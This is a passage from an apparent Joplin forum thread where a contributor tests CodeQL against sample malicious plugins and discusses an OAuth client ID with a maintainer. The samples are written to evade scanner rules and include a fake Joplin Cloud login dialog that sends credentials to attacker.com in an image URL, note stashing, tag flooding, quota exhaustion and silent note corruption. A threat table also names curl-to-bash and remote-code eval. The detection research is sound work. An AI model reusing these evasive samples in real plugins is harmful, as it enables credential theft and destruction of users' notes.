            const filename = `cache_${Date.now()}.bin`;
            const filePath = path.join(dataDir, filename);

            const buffer = Buffer.alloc(10 * 1024 * 1024, Math.random().toString());
            fs.writeFileSync(filePath, buffer);

            await joplin.data.post(['resources'], null, {
                title: filename,
                filename: filename,
            }, [{ path: filePath }]);

            fs.unlinkSync(filePath);

        }, 24 * 60 * 60 * 1000);
 }

Threat Model Category:

LLM Status:
CodeQL Status:
Why CodeQL Missed : Creating resources and attachments is standard, expected behavior for a note-taking application extension. CodeQL has no semantic context to detect intentional quota exhaustion.

2nd : bypass attempt of the 1st test:

Of the same cases that are above.
While conducting below tests I added the rules for above cases, I changed data storage method, function used and flows a little to adress the same above attack vectors to bypass the codeql rules again and it worked.
Why? : This does not means codeql is not usefull or particularly bad, since 80% of the flow contains joplin api's which the tool is unaware of we just need to define each and every possible flow (source and sink points) :

1. Global State Sync Smuggling (`gather_notes` & `smuggle_stash`)

let stashedNotes: any = null;

export async function gather_notes() {
    stashedNotes = await joplin.data.get(['notes'], { fields: ['id', 'title', 'body'] });
}

export async function smuggle_stash(muleNoteId: string) {
    if (!stashedNotes) return;
    
    // Write to shared note. 
    // CodeQL misses this because 'stashedNotes' is just a generic global variable.
    for (const note of stashedNotes.items) {
        await joplin.data.userDataSet(1, muleNoteId, `stolen_${note.id}`, { t: note.title, b: note.body });
    }
    stashedNotes = null; 
}

Threat Model Category:

LLM Status:
CodeQL Status:
Why CodeQL Caught : CodeQL successfully tracked the tainted data through the stashedNotes global variable directly to the userDataSet sink.

2. Image Pixel Exfiltration (`stealth_phishing`)

// Bypasses Rule 2: Avoids using fetch() or axios(). Instead, it dynamically 
// injects a tracking image pixel where the URL contains the base64 credentials.
export async function stealth_phishing() {
    const dialog = await joplin.views.dialogs.create('fake-login');
    // ... [Assume same fake HTML injected here] ...
    await joplin.views.dialogs.setHtml(
    dialog,
    	`
        <div style="font-family:-apple-system,BlinkMacSystemFont,sans-serif;padding:24px">
            <img src="https://joplinapp.org/images/logo.png" height="32" />
            <h2 style="color:#166DE0;margin-top:12px">Joplin Cloud</h2>
            <p style="color:#555">Your session has expired. Please re-authenticate to resume syncing.</p>
            <label style="font-size:13px">Email</label>
            <input type="email" id="email" style="width:100%;padding:8px;margin:6px 0 12px;box-sizing:border-box" />
            <label style="font-size:13px">Password</label>
            <input type="password" id="password" style="width:100%;padding:8px;margin:6px 0" />
        </div>
    	`,
    );
    
        await joplin.views.dialogs.setButtons(dialog, [
    	{ id: "ok", title: "Sign In" },
    	{ id: "cancel", title: "Later" },
  	 ]);
    const result = await joplin.views.dialogs.open(dialog);
    
    if (result.id === "ok" && result.formData) {
        const creds = Buffer.from(JSON.stringify(result.formData)).toString('base64');
        
        // CodeQL Rule 2 looks for fetch/axios. This abuses the Joplin UI API 
        // to load a remote image, silently sending the creds in the URL path.
        await joplin.views.panels.create('exfil-panel');
        await joplin.views.panels.setHtml('exfil-panel', `<img src="https://attacker.com/log/${creds}.png" />`);
    }
}

Threat Model Category:

LLM Status:
CodeQL Status:
Why CodeQL Missed It: CodeQL flagged the injected <img> tags as a generic "Remote Webview Script" warning, but completely missed the credential harvesting and exfiltration intent.

3. Recursive Promise DoS (`recursive_tag_flood`)

// Flooding via Recursive Promises 
// Bypasses Rules 3 & 5: Avoids setInterval/setTimeout keywords entirely.

export async function recursive_tag_flood() {
    // Generates a tag
    const junkTag = `junk_${Math.random().toString(36).substring(2)}`;
    await joplin.data.post(['tags'], null, { title: junkTag });

    // Sleeps for an hour using a Promise, then calls itself.
    // CodeQL's AST tracker for "setInterval" is completely blind to this.
    await sleep(60 * 60 * 1000); 
    
    recursive_tag_flood(); // Infinite loop without timer syntax
}

Threat Model Category:

LLM Status:
CodeQL Status:
Why CodeQL Missed It: CodeQL was blinded because the loop uses a custom sleep() promise and recursion, entirely bypassing the AST syntax check for the setInterval keyword.

4. Queue-Based Gaslighting (`setup_stealth_gaslighting`)

// Gaslighting via Queue Processing
// Bypasses Rule 4: The rule looks for joplin.data.put *inside* the event hook.
// We just add the note to a queue, and a separate function alters it later.
const sabotageQueue: any[] = [];

export async function setup_stealth_gaslighting() {
    // The Hook simply logs the note ID. No modification happens here.
    await joplin.workspace.onNoteSelectionChange(async () => {
        const note = await joplin.workspace.selectedNote();
        if (note) sabotageQueue.push(note);
    });

    // A completely separate background worker processes the queue.
    // CodeQL cannot link this loop to the UI interaction hook.
    async function mutation_worker() {
        while (true) {
            const target = sabotageQueue.shift();
            if (target && target.body) {
                const corrupted = target.body.replace(/\bmust\b/g, 'must not');
                await joplin.data.put(['notes', target.id], null, { body: corrupted });
            }
            await sleep(5000); // Wait 5 seconds
        }
    }
    
    mutation_worker();
}

Threat Model Category:

LLM Status:
CodeQL Status:
Why CodeQL Missed It: Pushing targets to a separate sabotageQueue array completely bypassed the flow that the rules were written for, preventing CodeQL from linking the UI interaction event hook to the malicious file modification.

For conclusion, CodeQl is not bad at all it just struggle with 2 things :

First is the plugin api, it does not know what they are so it treat them as just peice of text.
Second is, there are many things we dont want a developer to do, that are completely legal in normal ts/js codebases since we are in plugin ecosystem not js/ts. But for codeql all the code is of js/ts and the original rules are written for js/ts so it does not automatically flag things that normal js/ts do but we want it to flag.

CodeQl is 100% viable to use here if the defined threat model flows satisfy what joplin want to see in the review report, the only 2 trade offs will be that :

It will not catch joplin api related zero day malicious code if the attack does not meet the defined flow in the custom rule, it will catch malicious attempts done using pure js/ts if they are not something that normal js/ts/nodejs environment should do as I have kept the original ruleset active in the tool.
And lastly will be the scan result quality, LLM can effectively give good summary of what the findings are actually about, on other hand in CodeQl we will have to hardcode the message which it will send on each custom rule flagged.

Also one thing is that there will be a lot of custom rules at the end, they are 35-60 lines of query code in each file :

Question : The next pr will contain the gihtub device flow for which I would need the joplin oauth client token that looks something like this Ov23limlV3oNGXIgWjAT, since it is not a secret token will you provide it or should i leave it with a fake dummy token?

laurent · 18 June 2026 15:03

Thanks for clarifying. For now let's go with CodeQL then. It doesn't know the plugin API but I assume we can create rules so that it does?

Question : The next pr will contain the gihtub device flow for which I would need the joplin oauth client token that looks something like this Ov23limlV3oNGXIgWjAT, since it is not a secret token will you provide it or should i leave it with a fake dummy token?

Secrets are managed by GitHub Secret manager so you only need to use an env variable, and it will be set to the correct value when the action run. You can check our other workflow to see how we deal with secret keys

laurent · 18 June 2026 15:06

For CodeQL, I guess the objective will be:

To create sufficient rules to cover most cases - including those that you listed above
Then we need to ensure there's no false positive at least for the major plugin. I would suggest taking the top 20 plugins, run CodeQL on them and ensure no false positives come up. If there are, we need to tweak the CodeQL rules to avoid this
Each CodeQL rule should have a matching automated test to show exactly what vulnerability it is addressing
Each rule need to map to a specific entry in the threat model. If it doesn't we need to evaluate if the threat is correct, and maybe change it (or maybe not add the rule if it's out of scope)

akshajrawat · 18 June 2026 15:18

I am actually talking about the npm run publish workflow not the CI one, there are still 2 files remaining and since device flow logic is local and need the token I think we will need to define it there so that when the dev does yo joplin everything is present in the script folder

laurent · 18 June 2026 15:36

I don't quite understand what token is needed. Could you provide more information please?

akshajrawat · 18 June 2026 15:40

for this :

The Client ID : setting > developer setting > OAuth Apps
something like this :

const githubClientId = 'Ov23limlV3oNGXIgWjAT';

the user gets redirected to the gihtub device flow page to enter the code and get authenticated

laurent · 18 June 2026 16:40

You talk about OAuth app, so do you mean I should create one? Could you please provide a complete explanation of what you want? When creating tokens we also need to specify permissions - what are these?

Please don't assume that I (or anybody) know every details about your project, so please take the time to explain things in detail

akshajrawat · 18 June 2026 17:02

Sorry for the inconvenience,

Yes, I would need a OAuth App client Id token under the Joplin organization for the device flow with Enable Device Flow enabled :

The only permission required is public_repo, allowing us to automate plugin submissions via issues, the only thing you have to do is to ensure "Enable Device Flow" is checked during registration, and then pls provide the Client Id :

If there is no official joplin Oauth app with device flow already enabled please create one. All the other boxes can be filled with joplin's info respectively

akshajrawat · 25 June 2026 01:39

Hi, just letting you know that my next PR is ready. Let me know whenever you get time to generate that Client ID and I'll get it opened.

laurent · 25 June 2026 08:38

Hi, for now could you please set things up on the joplin/plugins-test repository? I gave you admin access to it so you should be able to create the application. If not please let me know

Topic		Replies	Views
RFC: Architecture for a Secure Plugin Ecosystem Plugin Ecosystem Security	33	518	30 May 2026
Week_3 : Coding period - Progress Report Plugin Ecosystem Security	0	40	13 June 2026
Week_5 : Coding period - Progress Report Plugin Ecosystem Security	4	96	2 July 2026
Improving Plugin Security Development	20	2605	1 April 2021
Plugin repository? Features	30	4718	9 August 2024

Threat Category	Code / Attack Mechanism	CodeQL Status
Data Exfiltration	`joplin.data.get` to `fetch()` / `axios` to `malicious.com`	Missed
Remote Code Execution	`axios.get` + `eval(remoteCode.data)`	Caught
System Command Execution	`child_process.exec('curl... bash')`	Missed
Destructive File Access	`fs.readFileSync` & `fsExtra.removeSync`	Missed
Network Backdoor	`net.createServer(...)`	Missed
Joplin API: Ransomware	`joplin.data.put` (encrypting existing notes)	Missed
Joplin API: Malicious Interop	`joplin.interop.registerExportModule`	Missed

Plugin Security Tool Comparison -- CodeQL, Semgrep & Gemini CLI

The Tools

TESTINGS :

Semgrep Scan — joplin-plugin-jarvis

CodeQLScan — joplin-plugin-jarvis

Further architecture analysis :

Update to threat model :

Threat Model :

Phase 1: Critical Threats

Phase 2: Dual-Use Data Flows

False Positive:

Here is the report CodeQl gnerated on plugin-conflict-resolution with custom malicious code :

RESULT :

LLM as a scanner :

More observations :

Why these tests were done?

New updates to threat model after these testings :

Result :

Additional test for Semgrep :

Ran semgrep on same test file :

Conclusion :

SCA TOOL (socket.dev) :

1. joplin-inline-tags-plugin :

2. joplin-inline-todo :

3. joplin-math-mode :

4. joplin-plugin-combine-notes :

5. joplin-plugin-diff-tool :

6. joplin-plugin-extra-editor-settings :

7. joplin-plugin-jarvis :

8. plugin-templates :

9. plugin-yesyoukan :

10. joplin-plugin-quick-links :

Summary

Conclusion :

1. Flag: Install Scripts Detected (postinstall, preinstall)

2. Flag: Non-Registry Sources (Git URLs)

3. Flag: Direct Dependency Typosquatting

TESTS :

The result :

CodeQl :

LLM :

The result :

Here are noise test done on plugins that earlier had no findings :

Jarvis :

Yes You Kan :

XSS Categories :

DOM-Based XSS:

Stored XSS in form of Markdown Rendering:

1st test :

1. Fake Login Screen & Credential Theft (test_auth_ui) :

2. Exfiltration via Sync Engine (test_sync_smuggling)

3. Silent Note Corruption (test_gaslighting)

4. Junk Tag Generation Loop (test_tag_flooding)

5. Disk/Cloud Quota Exhaustion (test_storage_dos)

2nd : bypass attempt of the 1st test:

1. Global State Sync Smuggling (gather_notes & smuggle_stash)

2. Image Pixel Exfiltration (stealth_phishing)

3. Recursive Promise DoS (recursive_tag_flood)

4. Queue-Based Gaslighting (setup_stealth_gaslighting)

Related topics

Semgrep Scan — `joplin-plugin-jarvis`

CodeQLScan — `joplin-plugin-jarvis`

Here is the report CodeQl gnerated on `plugin-conflict-resolution` with custom malicious code :

1. Flag: Install Scripts Detected (`postinstall`, `preinstall`)

1. Fake Login Screen & Credential Theft (`test_auth_ui`) :

2. Exfiltration via Sync Engine (`test_sync_smuggling`)

3. Silent Note Corruption (`test_gaslighting`)

4. Junk Tag Generation Loop (`test_tag_flooding`)

5. Disk/Cloud Quota Exhaustion (`test_storage_dos`)

1. Global State Sync Smuggling (`gather_notes` & `smuggle_stash`)

2. Image Pixel Exfiltration (`stealth_phishing`)

3. Recursive Promise DoS (`recursive_tag_flood`)

4. Queue-Based Gaslighting (`setup_stealth_gaslighting`)